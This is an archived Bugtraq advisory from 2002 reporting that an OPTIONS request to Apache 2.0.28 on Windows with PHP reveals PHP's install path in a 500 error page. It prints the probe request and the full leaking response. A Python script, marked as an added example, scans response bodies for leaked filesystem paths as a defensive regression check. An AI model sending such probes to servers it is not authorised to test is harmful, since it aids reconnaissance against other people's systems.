Bugtraq mailing list archives

PHP Advisory #2
From: "Paul Brereton" <brereton_paul () btopenworld com>
Date: Thu, 7 Feb 2002 12:03:00 -0000

Title : PHP Reveals True Path (OPTIONS)
Author : Paul Brereton
E-Mail : brereton_paul () btopenworld com

Summary : When a web administrator installs Apache with PHP and adds
index.php to the Apache configuration file, Apache first looks for index.php
when sending back the default web page for this directory. This opens up a
security weakness that allows remote attackers to gain sensitive information
about the directory structure of the Apache and PHP installation.

Details : Sending an OPTIONS request to the web server reveals the
installation path of PHP.

Example:
The OPTIONS output is shown here:

OPTIONS / HTTP/1.1
Host: 192.168.1.2
Accept: */*

< HTTP/1.1 500 Internal Server Error
< Date: Sun, 03 Feb 2002 10:56:53 GMT
< Server: Apache/2.0.28 (Win32)
< Vary: accept-language
< Accept-Ranges: bytes
< Content-Length: 680
< Connection: close
< Content-Type: text/html; charset=ISO-8859-1

< <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
< <HTML>
< <HEAD>
< <TITLE>Server error!</TITLE>
< <LINK REV="made" HREF="mailto:admin () 192 168 1 2">
< </HEAD>
<
< <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC">
< <H1>Server error!</H1>
< <DL>
< <DD>
<
<
<
< handler "cgi-script" not found for: C:/php/php.exe
<
<
< </DL><DL><DD>
<If you think this is a server error, please contact
<the <A HREF="mailto:admin () 192 168 1 2">Webmaster</A>
<
< </DL>
<
< <H2>Error 500</H2>
< <DL>
< <DD>
< <ADDRESS>
< <A HREF="/">192.168.1.2</A>
< <BR>
<
< <small>02/03/02 10:56:53</small>
< <BR>
< <small>Apache/2.0.28 (Win32)</small>
< </ADDRESS>
< </DL>
< </BODY>
< </HTML>
<

As you can see, the line 'handler "cgi-script" not found for: C:/php/php.exe'
reveals the install path of PHP.
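
Added example, not part of the original advisory: a Python check that scans an HTTP response body for absolute filesystem paths such as the one leaked above, usable as a regression test against your own server's error pages. The sample response is constructed from the output shown in the advisory; the function names and the list of Unix root directories are assumptions.

```python
import re

# Constructed sample: the advisory's OPTIONS response, trimmed to the relevant lines.
SAMPLE_RESPONSE = (
    "HTTP/1.1 500 Internal Server Error\r\n"
    "Server: Apache/2.0.28 (Win32)\r\n"
    "Content-Type: text/html; charset=ISO-8859-1\r\n"
    "\r\n"
    "<H1>Server error!</H1>\n"
    '<DD>\n handler "cgi-script" not found for: C:/php/php.exe\n</DL>\n'
    '<A HREF="/">192.168.1.2</A>\n'
    "<small>Apache/2.0.28 (Win32)</small>\n"
)

# Windows drive paths with either separator, e.g. C:/php/php.exe or C:\php\php.exe.
WIN_PATH = re.compile(r"\b[A-Za-z]:[\\/](?:[\w.\-]+[\\/])*[\w.\-]+")
# Unix absolute paths under common roots (assumed list). The lookbehind skips
# the path part of full URLs; root-relative links can still false-positive.
UNIX_PATH = re.compile(r"(?<![\w/])/(?:usr|opt|var|home|etc|srv)/[\w.\-/]+")


def split_response(raw):
    """Return (status_code, body) from a raw HTTP response string."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    status = int(head.split("\n")[0].split()[1])
    return status, body


def find_path_leaks(raw):
    """List every filesystem path found in the response body, with context."""
    status, body = split_response(raw)
    hits = []
    for lineno, line in enumerate(body.splitlines(), 1):
        for pattern in (WIN_PATH, UNIX_PATH):
            for match in pattern.finditer(line):
                hits.append({
                    "status": status,
                    "line": lineno,
                    "path": match.group(0),
                    "context": line.strip(),
                })
    return hits


if __name__ == "__main__":
    for hit in find_path_leaks(SAMPLE_RESPONSE):
        print("HTTP %(status)d body line %(line)d leaks %(path)s" % hit)
```
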

